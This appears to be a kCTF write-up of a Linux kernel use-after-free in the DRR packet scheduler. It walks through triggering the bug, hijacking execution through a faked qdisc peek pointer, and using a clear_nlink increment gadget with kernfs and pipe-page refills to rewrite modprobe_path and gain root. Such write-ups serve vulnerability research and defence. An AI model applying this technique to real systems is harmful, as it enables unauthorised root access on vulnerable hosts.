[   26.105306]  kasan_report+0xb6/0xf0
[   26.106059]  ? __list_del_entry_valid+0x7a/0x140
[   26.107056]  __list_del_entry_valid+0x7a/0x140
[   26.108001]  drr_qlen_notify+0x60/0xd0
[   26.108812]  qdisc_tree_reduce_backlog+0xf6/0x1f0
[   26.109827]  drr_delete_class+0x16e/0x2a0

We finally have a UAF and it happens when you go to delete class 1:1. So the PoC was entirely correct the whole time, and it was my bad kernel config and my assumptions about what must be happening (an impossible UAF on the qdisc) that led me astray for so long. As you can see from the backtrace, we know this code path well. This is the exact code path that leads to the initial list del bug we encountered when we were deleting class 1:3.

So now everything clicked for me. When we delete class 1:1 it is trying to unlink its alist list_head from the drr scheduler’s active list and when it does its list_del sanity checks, it’s accessing the freed 1:3 class’s list_head that remains in the active list even though we destroyed class 1:3. This is because we never removed it from the active list, the list_del we attempted tried to unlink class 3:1’s list_head instead. So this is where the UAF access comes from.

So now we can reason about how to exploit the UAF. From here, I created a similar PoC in my exploit just to make sure I had the right constituent parts but was able to reduce the complexity a bit because in hindsight, the bug is quite simple once you understand all of the moving parts. There are aspects of my exploit setup that are not strictly required, but keeping it relatively close to the PoC helped me initially and then I just left the code in there.

Here are the steps I followed to trigger the bug:

Create a root qdisc for the loopback interface that is of type drr
Create class 1:1 of type drr
Create class 1:3 of type drr
Assign a plug qdisc to class 1:1
Assign a pfifo (default type) qdisc to 1:3, this will be our reparented buggy qdisc later
Create class 1:2 of type drr and reparent 1:3’s qdisc to 1:2, triggering the bug
Enqueue packets in 1:1 and 1:2, this will place 1:1 and 1:2 class alist list_head nodes in the scheduler’s active list
Delete class 1:1, I do this first because it will require sane list_head values for class 1:2 when it removes itself from the active list
Delete class 1:2, this will fail to remove 1:2’s list_head from the active list but will free the class
?? Profit
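The last few steps above can be replayed in a small userspace model to show how the freed class ends up stranded on the active list. This is a sketch, not the kernel’s logic: struct link, struct cls and the helper names are made up, and the freed flag stands in for kfree() so nothing is actually freed or dereferenced after free.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct link {
	struct link *prev;
	struct link *next;
};

struct cls {
	struct link alist;	/* first member, so a link pointer is also a cls pointer */
	bool freed;		/* stands in for kfree(); nothing is really freed here */
};

static void add_tail(struct link *n, struct link *head)
{
	n->prev = head->prev;
	n->next = head;
	head->prev->next = n;
	head->prev = n;
}

/* Checked unlink: refuses nodes that were never linked or look corrupted. */
static bool del_checked(struct link *e)
{
	if (e->next == NULL || e->prev == NULL)
		return false;
	if (e->prev->next != e || e->next->prev != e)
		return false;
	e->prev->next = e->next;
	e->next->prev = e->prev;
	e->prev = NULL;
	e->next = NULL;
	return true;
}

/*
 * Delete `victim`. `notified` is the class whose alist the notify callback
 * tries to unlink, i.e. whatever the child qdisc thinks its parent is.
 */
static bool delete_class(struct cls *victim, struct cls *notified)
{
	bool unlinked = del_checked(&notified->alist);

	victim->freed = true;
	return unlinked;
}

/* Returns the first class left on the active list, or NULL if it is empty. */
static struct cls *run_sequence(struct link *active, struct cls *c11,
				struct cls *c12, struct cls *c13)
{
	assert(active && c11 && c12 && c13);
	active->prev = active;
	active->next = active;
	add_tail(&c11->alist, active);	/* packet enqueued to 1:1 */
	add_tail(&c12->alist, active);	/* packet enqueued to 1:2 */
	delete_class(c11, c11);		/* sane parent: 1:1 is unlinked */
	delete_class(c12, c13);		/* stale parent: unlink is tried on 1:3 */
	if (active->next == active)
		return NULL;
	return (struct cls *)active->next;
}
```

Running the sequence with three classes whose alist pointers start as NULL leaves 1:2 as the first entry on the active list with its freed flag set, which is the dangling reference we want to reach next.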

So now we have to find out how the active list is used so that we can see how we can access our freed class that has a reference cached in the active list. A quick grep for active in sch_drr.c will lead you to drr_dequeue:

static struct sk_buff *drr_dequeue(struct Qdisc *sch)
{
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl;
	struct sk_buff *skb;
	unsigned int len;

	if (list_empty(&q->active))	// [1]
		goto out;
	while (1) {
		cl = list_first_entry(&q->active, struct drr_class, alist); // [2]
		skb = cl->qdisc->ops->peek(cl->qdisc); // [3]
		if (skb == NULL) {
			qdisc_warn_nonwc(__func__, cl->qdisc);
			goto out;
		}

		len = qdisc_pkt_len(skb);
		if (len <= cl->deficit) {
			cl->deficit -= len;
			skb = qdisc_dequeue_peeked(cl->qdisc);
			if (unlikely(skb == NULL))
				goto out;
			if (cl->qdisc->q.qlen == 0)
				list_del(&cl->alist);

			bstats_update(&cl->bstats, skb);
			qdisc_bstats_update(sch, skb);
			qdisc_qstats_backlog_dec(sch, skb);
			sch->q.qlen--;
			return skb;
		}

		cl->deficit += cl->quantum;
		list_move_tail(&cl->alist, &q->active);
	}
out:
	return NULL;
}

[1]: This function gets invoked whenever a packet is received on the root drr qdisc’s interface and the way the drr algorithm works is it looks through its active packet flows and tries to dequeue packets based on the requirements of each active class. It first checks to make sure there are actually active classes on the scheduler’s active list. Our buggy class is on the active list thankfully because of class 1:1 making sure that no packets are dequeued by virtue of its plug qdisc. So tip of the cap to the patch author and Lion Ackermann, thank you!
[2]: In a while loop, we first get a handle to the first struct drr_class on the active list. Since we first deleted class 1:1, which had packets enqueued in its plug qdisc, this first class should be our UAF class
[3]: This is what caught my eye: since we have a UAF on cl, we potentially can hijack RIP here since we can possibly control the entirety of cl->qdisc->ops->peek() and replace peek() with a function of our choice

Now it was time to develop an exploit plan.

Exploit Plan

Seeing that we invoke cl->qdisc->ops->peek(), I was confident that I could hijack execution. This turned out to be entirely true, at this point I told some friends that all I had to do was some ROP and I’d be on my way to capturing the flag. This turned out to be entirely false and completing the exploit was a lot more difficult than I anticipated. The main issue I had trying to ROP was that I couldn’t find a stack-pivot gadget that worked with our register control at the time that we hijack execution in order for us to start ROP’ing:

$rax   : 0xffffffff81356310					// [1]
$rbx   : 0xffff88800f295bd0					// [2]
$rcx   : 0x20000           
$rdx   : 0x0               
$rsp   : 0xffffc9000188baf0
$rbp   : 0xffff888006d19e00
$rsi   : 0x0               
$rdi   : 0xffffffff84267b88					// [3]
$rip   : 0xffffffff81d71bd8
$r8    : 0x1               
$r9    : 0xffffc9000188bb90
$r10   : 0xffff88800f2719e0
$r11   : 0xffff888006b6a660
$r12   : 0xffff888006d19f40
$r13   : 0x0               
$r14   : 0xffff888006d19e00
$r15   : 0xffff888006d19e00
$eflags: [zero CARRY parity adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x10 $ss: 0x18 $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00 
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0xffffffff81d71bcc  mov    rdi, QWORD PTR [rbx+0x10]
   0xffffffff81d71bd0  mov    rax, QWORD PTR [rdi+0x18]
   0xffffffff81d71bd4  mov    rax, QWORD PTR [rax+0x38]
 → 0xffffffff81d71bd8  call   rax

Here I’m showing you the GDB output when we’re about to call rax, which is when we call the peek that we hijack. We have the following register control:

[1]: rax ends up being the function address we want to call, so any ROP stack pivot that utilizes rax would be self-referential in a way that made it difficult to find an appropriate gadget
[2]: rbx ends up being an address inside our UAF class. This is great for us as this could represent a way to stack-pivot since we control the contents around this address; however, I was unable to find any stack pivot gadgets that help us here
[3]: rdi ends up being the address of the UAF class’s qdisc. Again, this would be great for us because we control this memory but I was unable to find an appropriate stack pivot gadget
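The three loads in the disassembly are just the cl->qdisc->ops->peek chain. Here is a userspace sketch of that chain, with structures padded only so the fields land at the offsets visible in the disassembly (0x10, 0x18 and 0x38). The struct names, call_peek and marker are hypothetical, and the padding is not the real kernel layout, just enough to reproduce the offsets.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef void *(*peek_fn)(void *qdisc);

struct fake_ops {
	uint8_t pad[0x38];
	peek_fn peek;			/* mov rax, [rax+0x38] */
};

struct fake_qdisc {
	uint8_t pad[0x18];
	struct fake_ops *ops;		/* mov rax, [rdi+0x18] */
};

/* What rbx points at: some address inside the class, not its start. */
struct fake_class_view {
	uint8_t pad[0x10];
	struct fake_qdisc *qdisc;	/* mov rdi, [rbx+0x10] */
};

_Static_assert(offsetof(struct fake_ops, peek) == 0x38, "peek offset");
_Static_assert(offsetof(struct fake_qdisc, ops) == 0x18, "ops offset");
_Static_assert(offsetof(struct fake_class_view, qdisc) == 0x10, "qdisc offset");

/* Follows the same three dereferences, then makes the indirect call. */
static void *call_peek(struct fake_class_view *rbx)
{
	assert(rbx != NULL);
	struct fake_qdisc *rdi = rbx->qdisc;
	peek_fn rax = rdi->ops->peek;

	return rax(rdi);
}

/* Stand-in target that returns its first argument so the caller can see it. */
static void *marker(void *qdisc)
{
	return qdisc;
}
```

Whoever controls the memory behind all three pointers picks the function that gets called, and that function receives the fake qdisc pointer as its first argument.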

To be quite honest, I didn’t spend too much time trying to make ROP work, there were perhaps gadgets or strategies that I didn’t think of or consider that would’ve enabled me to use ROP but I gave up pretty quickly, probably a couple hours or so of looking. I figured with our precise control over rdi and the fact that we have what amounts to an arbitrary function call primitive, I felt like there had to be gadgets (single function calls) we could leverage to capture the flag.

First things first, I knew from other entries and players that I didn’t really have to worry about KASLR as a barrier, because I could always just use the Entrybleed side-channel, so I didn’t invest any time in trying to think of other ways to defeat KASLR. There was also the possibility that we use the WARN() splat from the invalid list_del which ends up showing us register values containing heap pointers, our PID (on COS instances we spawn inside a namespace jail and we don’t know our real pid), and a kernel text pointer that could be used to defeat KASLR. I thought this was sort of inelegant but never crossed it off my list of possibilities. Luckily I was able to complete the exploit without resorting to this.

With that settled, I moved onto what we should do to refill the freed class so that we could control what function is called. I identified the nft_table->udata field as a nice elastic object that is 100% user-controlled back in around 2023 that could be used as a refill object for kmalloc slab caches up to kmalloc-256, but never got the chance to use it. Kernel devs eventually turned this allocation into a GFP_KERNEL_ACCOUNT allocation, so it can’t be used any more if the slab caches are separate to replace general kmalloc-128 objects like our class. But on the Google COS instance which runs a 5.15.173+ kernel, the allocation was non-accounted so I decided to use it.

With this refill object, we can now fake 100% of the UAF class, which is obviously helpful. The problem is that due to the multiple pointer dereferences in the indirect call to cl->qdisc->ops->peek, we also need to control data at a known location from the kernel base. I first looked for an opportunity to use RetSpill to smuggle user controlled values into my kernel stack, but we end up in our gadget via a sendto syscall which unfortunately doesn’t happen to spill any user values onto the kernel stack, at least from what I could tell. Next I settled on using the kernfs_pr_cont_buf, which I learned about in the kCTF Discord from @roddux. They had read this writeup which contained the details. Basically, if your kernel has CONFIG_NETFILTER_XT_MATCH_CGROUP, which kCTF instances do, then you can store up to PATH_MAX bytes of user controlled data at a known offset from the kernel base. This is insane actually and makes exploitation so much easier. The best part is the data there is very mutable, you can just keep resetting its contents. You can accomplish this by establishing an iptables match rule on a cgroup file path, and the file path gets stored as data in the buffer. The only catch is that the buffer is meant to store a path name, thus, any NULL byte could terminate your data buffer. So this is something I had to account for in my exploit.
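Since the buffer is treated as a path string, it helps to check a payload for embedded zero bytes before sending it. The helpers below are a hypothetical sketch of that check, not code from my exploit: put_u64 appends a pointer-sized value in little-endian byte order and first_nul reports where the string would be cut off.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Index of the first zero byte in buf[0..len), or len if there is none. */
static size_t first_nul(const uint8_t *buf, size_t len)
{
	const uint8_t *p = memchr(buf, 0, len);

	return p ? (size_t)(p - buf) : len;
}

/*
 * Append v in little-endian byte order at offset len.
 * Returns the new length, or 0 if the value does not fit in cap bytes.
 */
static size_t put_u64(uint8_t *buf, size_t len, size_t cap, uint64_t v)
{
	assert(buf != NULL && len <= cap);
	if (cap - len < 8)
		return 0;
	for (int i = 0; i < 8; i++)
		buf[len + i] = (uint8_t)(v >> (8 * i));
	return len + 8;
}
```

For example, a value like 0xffffffff81356310 contains no zero byte and is safe to place anywhere, while a value whose low byte is 0x00 would truncate the payload at that position, so it has to go at the very end or be avoided.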

Now we seemingly had everything we needed to explore what function to call. We had our fake class which was in nft_table->udata and our fake qdisc and its ops table at a known address in kernfs_pr_cont_buf. The next thing I wanted to accomplish at this point was to determine what side-effects hijacking execution here brought with it. So I used our function call primitive to just call a ret gadget, and see where we end up. We immediately blow up in drr_dequeue for a few reasons:

static struct sk_buff *drr_dequeue(struct Qdisc *sch)
{
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl;
	struct sk_buff *skb;
	unsigned int len;

	if (list_empty(&q->active))
		goto out;
	while (1) {
		cl = list_first_entry(&q->active, struct drr_class, alist);
		skb = cl->qdisc->ops->peek(cl->qdisc);				// [1]
		if (skb == NULL) {
			qdisc_warn_nonwc(__func__, cl->qdisc);
			goto out;
		}

		len = qdisc_pkt_len(skb);					// [2]
		if (len <= cl->deficit) {					// [3]
			cl->deficit -= len;					// [4]
			skb = qdisc_dequeue_peeked(cl->qdisc);			// [5]
			if (unlikely(skb == NULL))
				goto out;					// [6]
			if (cl->qdisc->q.qlen == 0)
				list_del(&cl->alist);

			bstats_update(&cl->bstats, skb);
			qdisc_bstats_update(sch, skb);
			qdisc_qstats_backlog_dec(sch, skb);
			sch->q.qlen--;
			return skb;						// [7]
		}

		cl->deficit += cl->quantum;
		list_move_tail(&cl->alist, &q->active);				// [8]
	}
out:
	return NULL;
}

Once we call our simple ret gadget during our experiment we return to [1] where the return value is interpreted as a pointer to a sk_buff. This could be a problem for us because whatever gadget we use could do something with the return value that is supposed to be stored in rax. In our experiment, our function doesn’t touch rax, we just return, so rax still points to a function address. So it definitely isn’t NULL. Since it’s not NULL we progress to [2], which ends up being something like a read of an skb field value, like skb->len, so this will return a value from reading executable text in our case, because rax is a function address. At [3] we see that if the value it reads from the kernel text is less than or equal to our fake class deficit value, we enter this if statement body at [4]. Here, we are actually decrementing a value in our fake class, so this will write to our nft_table->udata refill object. That is notable because that is an immutable refill object, once we refill (allocate it) we have no way of resetting/changing its contents. We then see a call to qdisc_dequeue_peeked in [5], which we will get into in a second, and if that returns NULL, we can escape this hell-hole of a function at [6]. Separately, if we make it to [7], which would incur several memory accesses to our fake qdisc, we return a non-NULL pointer value. My goal from the start was that if we were to restore execution gracefully and as simply as possible, we would be required to return NULL from this function so that the calling function had nothing to do with the results of our hijacked execution. We can see even more list manipulation at [8] so I wanted to avoid this at all costs.

Let’s then go check on the call to qdisc_dequeue_peeked which takes a pointer to our fake qdisc as its argument in [5]:

/* use instead of qdisc->dequeue() for all qdiscs queried with ->peek() */
static inline struct sk_buff *qdisc_dequeue_peeked(struct Qdisc *sch)
{
	struct sk_buff *skb = skb_peek(&sch->gso_skb);			// [1]

	if (skb) {							// [2]
		skb = __skb_dequeue(&sch->gso_skb);
		if (qdisc_is_percpu_stats(sch)) {
			qdisc_qstats_cpu_backlog_dec(sch, skb);
			qdisc_qstats_cpu_qlen_dec(sch);
		} else {
			qdisc_qstats_backlog_dec(sch, skb);
			sch->q.qlen--;
		}
	} else {
		skb = sch->dequeue(sch);				// [3]
	}

	return skb;
}

We see that we get a pointer to another sk_buff by calling skb_peek() on the gso_skb field of our fake qdisc. This is good news for us, because that means that this outcome is probably somewhat controllable for us since we control the entirety of the fake qdisc. We’ll examine skb_peek() in a second. If we return a non-NULL socket buffer from skb_peek, we then go on to call __skb_dequeue with the pointer to gso_skb and it goes on to do more list manipulation and memory accesses on the fake qdisc. This looked very unattractive to me compared to yet another indirect function call in sch->dequeue(sch) which we should be able to again hijack because we control the fake qdisc. So at this point I’m thinking:

We hijack execution in two places: once in drr_dequeue and once in qdisc_dequeue_peeked
We can use the first hijacking to do something useful
We can use the second hijacking to restore execution in some way gracefully

So the first thing I tried was killing my task in the first hijacking spot just to make sure it was possible to do. I tried a few tricks that other players have used and ended up trying to use do_exit as the way to kill my task, which is whatever task I use to send a packet to the loopback interface which triggers the call to drr_dequeue. The problem is that I hit this code block:

if (unlikely(in_interrupt()))
		panic("Aiee, killing interrupt handler!");

This means that we hijack execution in an interrupt context, likely from the interrupt caused by the loopback interface receiving a packet. So these types of tricks that typically apply to a normal process context don’t apply here, and I don’t have powerful enough primitives (we’re just limited to two function calls, not a full ROP chain) to remove my task from an interrupt context. So my plan was to just exit the dequeue function normally by returning NULL if possible.

To see if this is feasible, we need to see where and how we can reach the sch->dequeue inside of qdisc_dequeue_peeked which is our 2nd hijack spot. We need skb_peek(&sch->gso_skb) to return NULL:

static inline struct sk_buff *skb_peek(const struct sk_buff_head *list_)
{
	struct sk_buff *skb = list_->next;

	if (skb == (struct sk_buff *)list_)
		skb = NULL;
	return skb;
}

Turns out this is just a simple check to see if a list head element points to itself, indicating that the list is empty. We can actually do this because we control the fake qdisc. As long as the value at the offset of &sch->gso_skb points to its own address, we can return NULL from this function. That lands us right in sch->dequeue, our 2nd hijack spot. Our goal is to have qdisc_dequeue_peeked return NULL, so we need this arbitrary function call to return NULL or 0. So now we need two gadgets or function calls:

A function call that does something useful with our control over rdi
A function call that simply returns NULL or 0 to restore execution gracefully within drr_dequeue
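
The empty-list condition is easy to check in a userspace model. The sketch below is a stand-in under stated assumptions, not kernel code: fake_head, model_peek, and forge_empty are hypothetical names that mirror only the next-pointer comparison in skb_peek(), and the “fake qdisc” is reduced to a list head that points at itself.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for struct sk_buff_head: only the two link fields. */
struct fake_head {
    struct fake_head *next;
    struct fake_head *prev;
};

/* Mirrors the comparison in skb_peek(): a head whose next pointer is the
 * head itself is treated as an empty list, so NULL is returned. */
static struct fake_head *model_peek(const struct fake_head *list_)
{
    struct fake_head *first = list_->next;

    if (first == (struct fake_head *)list_)
        first = NULL;
    return first;
}

/* Forge an "empty" list the way the fake qdisc would: store the address of
 * the head inside the head itself. */
static void forge_empty(struct fake_head *head)
{
    assert(head != NULL);
    head->next = head;
    head->prev = head;
}
```

After forge_empty(&head), model_peek(&head) returns NULL, while a head whose next field points at any other node returns that node.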

Gadget Hunting

I assumed finding the 2nd gadget would be easy, a function call that simply returns 0 or NULL; however, it still took me some time to find. The first thought I had was let’s just find a function like this:

u64 function(struct foo *obj) {
	return obj->field;
}

This would be easy: we control the entirety of the memory pointed to by struct foo * and we could simply read a field that holds 0. But then I remembered that I can’t really have NULL values in my kernfs_pr_cont_buf because it’s interpreted as a path name when it’s sent. So I skipped this idea. What would be even better is a function like this:

u64 function(struct foo *obj) {
	return obj->field->val;
}

This would be perfect, we could just have field point to something that is guaranteed to be 0, such as the end of our kernfs_pr_cont_buf where a NULL value is no issue. I found just that in this function:

static unsigned int
sch_frag_dst_get_mtu(const struct dst_entry *dst)
{
	return dst->dev->mtu;
}
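
To make the double dereference concrete, here is a userspace sketch under stated assumptions: fake_dev, fake_dst, fake_buf, and the helper names are hypothetical stand-ins for the kernel types, and the buffer is an ordinary struct whose tail is zero. The point is only that the first-level object can be full of non-zero bytes as long as its pointer lands on the zero tail.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical stand-ins for struct net_device and struct dst_entry. */
struct fake_dev { unsigned int mtu; };
struct fake_dst { struct fake_dev *dev; };

/* Model of the controlled buffer: non-zero "path" bytes, then a zero tail. */
struct fake_buf {
    unsigned char path[56];
    struct fake_dev tail;
};

/* Same shape as sch_frag_dst_get_mtu(): read a field through a pointer. */
static unsigned int model_get_mtu(const struct fake_dst *dst)
{
    return dst->dev->mtu;
}

/* Fill the path area with non-zero bytes, keep the tail zero, and aim the
 * dev pointer of the fake dst at that tail. */
static void build_fake_dst(struct fake_buf *buf, struct fake_dst *dst)
{
    assert(buf != NULL && dst != NULL);
    memset(buf->path, 'A', sizeof(buf->path));
    memset(&buf->tail, 0, sizeof(buf->tail));
    dst->dev = &buf->tail;
}
```

With this layout model_get_mtu() returns 0 even though no byte in the path area is zero.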

So now we have our “return NULL gadget” and it was time to find our “do something useful gadget”. I played around with the idea for a long time of using this first hijack spot to perform an arbitrary free to upgrade our limited class UAF to something more useful, a more generalized UAF. I would need something like this probably:

void function(struct foo *obj) {
	kfree(obj->ptr);
	return;
}

I quickly abandoned this idea though, because I didn’t have a leaked heap pointer to point the kfree at and I didn’t want to resort to using leaked pointers from our WARN() splat because it felt like cheating. So then I became determined to find an arbitrary write gadget. With an arbitrary write gadget, I would be able to overwrite modprobe_path to point to a file I control and read the flag from the container host. This has been done in numerous ways in the kCTF program, so I knew it was feasible. Now began the hard work of finding a write gadget.

Finding an Arbitrary Write Function

Finding the write function took me a very long time. I was looking for a function that took a single pointer argument and derived a write from its contents, something like this:

void function(struct foo *obj) {
	u64 *location = obj->field;
	*location = obj->value;
}

This would derive both the “what” and the “where” of the write from rdi, which we control as our fake qdisc. To start searching, I thought about which data structures in the kernel are humongous and often self-contained logic-wise, i.e., likely to be passed to a function by themselves. I narrowed my search down to the following structure types: socket buffers, files, directory entries, inodes, and a few others. Cycling through these subsystems and grepping for patterns, I eventually found this function:

void clear_nlink(struct inode *inode)
{
	if (inode->i_nlink) {
		inode->__i_nlink = 0;
		atomic_long_inc(&inode->i_sb->s_remove_count);
	}
}

This fits our needs perfectly: if the i_nlink field of the passed-in inode is non-zero, which is what we prefer anyway, the function increments the value at inode->i_sb->s_remove_count as if it’s a u64 value. An increment is a limited kind of write primitive: we can target a single byte at a time, increment it until it reaches the desired value, and then move on to the next byte. So my goal became:

Use the increment primitive to increment the first character of /sbin/modprobe in kernel memory
Use the return NULL hijack to exit gracefully from drr_dequeue
Send another packet to repeat until /sbin/modprobe is overwritten to something we control
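
A userspace model makes the primitive easier to reason about. This is a sketch under assumptions, not the kernel’s code: fake_inode, model_clear_nlink, aim_at, and FAKE_REMOVE_COUNT_OFF are hypothetical names, the offset value is arbitrary, and the 64-bit increment goes through memcpy so that it is valid at unaligned addresses. On a little-endian machine such as x86-64 the increment lands on the byte at the target address, with any carry spilling into the bytes that follow.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical offset of the counter inside the modelled superblock. */
#define FAKE_REMOVE_COUNT_OFF 0x40UL

struct fake_inode {
    unsigned int i_nlink; /* must be non-zero for the increment to fire */
    uintptr_t i_sb;       /* attacker-chosen "superblock" address */
};

/* Same shape as clear_nlink(): zero the link count, then increment the
 * 64-bit value found at i_sb + offset. Returns 1 if the increment ran. */
static int model_clear_nlink(struct fake_inode *inode)
{
    uint64_t count;
    unsigned char *where;

    if (!inode->i_nlink)
        return 0;
    inode->i_nlink = 0; /* the gadget disarms itself on every call */
    where = (unsigned char *)(inode->i_sb + FAKE_REMOVE_COUNT_OFF);
    memcpy(&count, where, sizeof(count));
    count++;
    memcpy(where, &count, sizeof(count));
    return 1;
}

/* Point the fake inode at a target byte by pre-subtracting the offset,
 * and re-arm i_nlink so the next call performs the increment. */
static void aim_at(struct fake_inode *inode, void *target)
{
    assert(target != NULL);
    inode->i_sb = (uintptr_t)target - FAKE_REMOVE_COUNT_OFF;
    inode->i_nlink = 1;
}
```

Aiming the model at the first byte of a local copy of /sbin/modprobe and calling it once turns the leading '/' (0x2f) into '0' (0x30) on a little-endian host. A second call does nothing until aim_at() re-arms i_nlink, which is the reset problem in miniature.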

One iteration of this worked perfectly, and I was able to check after the iteration and see that /sbin/modprobe had become 0sbin/modprobe in memory. So the concept worked, but now we have other problems: we need to execute this code path many times over because we need to do a lot of incrementing. We want /sbin/modprobe to become something like /proc/500/fd/3, where pid 500 is a pid of ours and fd 3 is a privilege escalation script that gets executed when the kernel tries to invoke the modprobe_path.

So let’s revisit drr_dequeue and identify the spots that cause problems:

static struct sk_buff *drr_dequeue(struct Qdisc *sch)
{
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl;
	struct sk_buff *skb;
	unsigned int len;

	if (list_empty(&q->active))
		goto out;
	while (1) {
		cl = list_first_entry(&q->active, struct drr_class, alist);
		skb = cl->qdisc->ops->peek(cl->qdisc);				
		if (skb == NULL) {
			qdisc_warn_nonwc(__func__, cl->qdisc);
			goto out;
		}

		len = qdisc_pkt_len(skb);					// [1]
		if (len <= cl->deficit) {					// [2]
			cl->deficit -= len;					// [3]
			skb = qdisc_dequeue_peeked(cl->qdisc);			
			if (unlikely(skb == NULL))
				goto out;					
			if (cl->qdisc->q.qlen == 0)
				list_del(&cl->alist);

			bstats_update(&cl->bstats, skb);
			qdisc_bstats_update(sch, skb);
			qdisc_qstats_backlog_dec(sch, skb);
			sch->q.qlen--;
			return skb;						
		}

		cl->deficit += cl->quantum;
		list_move_tail(&cl->alist, &q->active);				
	}
out:
	return NULL;
}

To execute this code path over and over, we need to make sure we always enter the if statement body. So we always need len <= cl->deficit to be true. Remember that len is derived from reading a value at some offset in the kernel text next to our arbitrary write gadget address, so we have zero control over the value that is returned. But we do control cl->deficit with our nft_table->udata, so we can make sure that it is always 0xffffffff. Awesome, we’re good to go. Nope: at [3] that value is decremented in place by len, so that memory is accessed and written to. This is a big problem for me: nft_table->udata is immutable, so I have no way of updating that value to reset it.

At this point, I realized I’d have to completely redo my strategy for refilling the UAF class. I should’ve done this from the beginning but I was so stupidly attached to this idea of using nft_table->udata because I had discovered it independently a couple years ago and had some weird sense of pride in being able to finally use it. I decided to get the entire victim class object page sent back to the page allocator and reclaim the page with a pipe buffer page backing as I had done previously in my last kCTF exploit. This would give me mutable memory that I could reset every iteration.

But there was also another detail in the path in our write gadget:

void clear_nlink(struct inode *inode)
{
	if (inode->i_nlink) {
		inode->__i_nlink = 0;
		atomic_long_inc(&inode->i_sb->s_remove_count);
	}
}

This gadget zeroes out inode->__i_nlink, and we require that value to be non-zero in order to do the increment. So this would have to be reset as well. On top of that, we also need to slide the write target as we successfully increment each character of /sbin/modprobe until it’s /proc/500/fd/3. So we’ll need to reset the kernfs_pr_cont_buf memory each iteration as well, which is not as big of a deal since that is easily doable with iptables.

So now the exploit plan was clear:

Increment a single byte of the modprobe_path string
Reset the page backing of all of the pipes we have allocated pages for, one of them has reclaimed our freed page containing the victim UAF class, so that we can update cl->deficit to 0xffffffff
Reset the kernfs_pr_cont_buf contents to give inode->i_nlink a non-NULL value
Possibly reset the target pointed to by s_remove_count if we have incremented the current character enough in the modprobe_path string
Repeat until finished

Putting It All Together

Instead of messing with any arithmetic for determining how to increment each /sbin/modprobe byte until it becomes /proc/500/fd/3, I just simulated each write in my exploit program. So I created a local copy of /sbin/modprobe and a local copy of /proc/500/fd/3 and I simulated the increment logic one iteration at a time, making sure to actually execute the increment in kernel space as well. This way, I could basically just do the increment blind and know when it was done without doing any arithmetic really. Probably better ways to do this, but this was my first idea and it worked really well for me. This actually worked first try and I successfully got /sbin/modprobe changed to /proc/500/fd/3.
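
A sketch of what such a simulation could look like is shown below. It rests on assumptions rather than on the exploit’s actual code: model_inc64 and simulate_overwrite are hypothetical names, each kernel-side increment is modelled as a 64-bit little-endian increment at the current byte, and the local copy is zero-padded so that carries have somewhere to go.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Model one 64-bit little-endian increment at buf[off]: bump the low byte
 * and let any carry ripple into the following bytes. */
static void model_inc64(uint8_t *buf, size_t off)
{
    for (size_t k = 0; k < 8; k++) {
        buf[off + k]++;
        if (buf[off + k] != 0)
            break; /* no carry out of this byte */
    }
}

/* Walk the string left to right, terminator included, incrementing at each
 * position until the local copy matches the target. Returns the number of
 * increments, or 0 if the buffer is too small to model the 8-byte writes
 * (0 is also returned when nothing needs to change). */
static size_t simulate_overwrite(uint8_t *buf, size_t buf_len,
                                 const char *target)
{
    size_t len = strlen(target) + 1; /* include the NUL terminator */
    size_t total = 0;

    assert(buf != NULL);
    if (buf_len < len + 7)
        return 0;
    for (size_t i = 0; i < len; i++) {
        while (buf[i] != (uint8_t)target[i]) {
            model_inc64(buf, i); /* a real run would fire the gadget here */
            total++;
        }
    }
    return total;
}
```

Run against a zero-padded local copy of /sbin/modprobe with /proc/500/fd/3 as the target, the loop ends with the two strings equal. Bytes past the terminator can be left non-zero by carries, which is harmless for a NUL-terminated path, and handling the terminator like any other position is what absorbs a carry out of the last character.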

In the namespace jail, you don’t know your pid ahead of time, so I had to use a trick suggested in the kCTF discord by @pqlpql a while ago, which is to spray a certain number of child processes and guess a pid that is likely to belong to one of those children. This is very simple and clever, and it works very well because when you get a shell on the kCTF COS instance you are on a fresh boot, so pids are very predictable. I found that spraying 500 child pids would reliably mean that pid 500 would be one of your child processes.
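
The spraying step can be sketched as follows, under assumptions: spray_children, pid_in_spray, and reap_children are hypothetical helper names, the children simply block in pause(), and nothing here depends on kCTF specifics. Whether a particular pid lands among the children depends on how many processes already exist on the system.

```c
#include <assert.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork up to n children that block until they are killed; store their
 * pids in pids[] and return how many were created. */
static size_t spray_children(pid_t *pids, size_t n)
{
    size_t made = 0;

    assert(pids != NULL);
    for (size_t i = 0; i < n; i++) {
        pid_t pid = fork();
        if (pid < 0)
            break; /* fork failed, stop spraying */
        if (pid == 0) {
            for (;;)
                pause(); /* child: sleep until a fatal signal arrives */
        }
        pids[made++] = pid;
    }
    return made;
}

/* Returns 1 if the guessed pid belongs to one of the sprayed children. */
static int pid_in_spray(const pid_t *pids, size_t n, pid_t guess)
{
    for (size_t i = 0; i < n; i++) {
        if (pids[i] == guess)
            return 1;
    }
    return 0;
}

/* Kill and reap every sprayed child so none are left behind. */
static void reap_children(const pid_t *pids, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        kill(pids[i], SIGKILL);
        waitpid(pids[i], NULL, 0);
    }
}
```

In the exploit setting the guess is fixed ahead of time (500 here) and the spray size is chosen so that the guess very likely falls inside the range of pids handed out to the children.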

Using this, at the beginning of our exploit we just need the sprayed children to open a privesc script that will be run with kernel privileges so that their /proc/self/fd/3 would be the privesc script. And to read the flag I basically just made the script do: cat /flag > /proc/500/fd/0 and had all of the children do blocking reads on their STDIN file descriptors. Whoever is pid 500 would print the flag contents to the terminal and it worked first try:

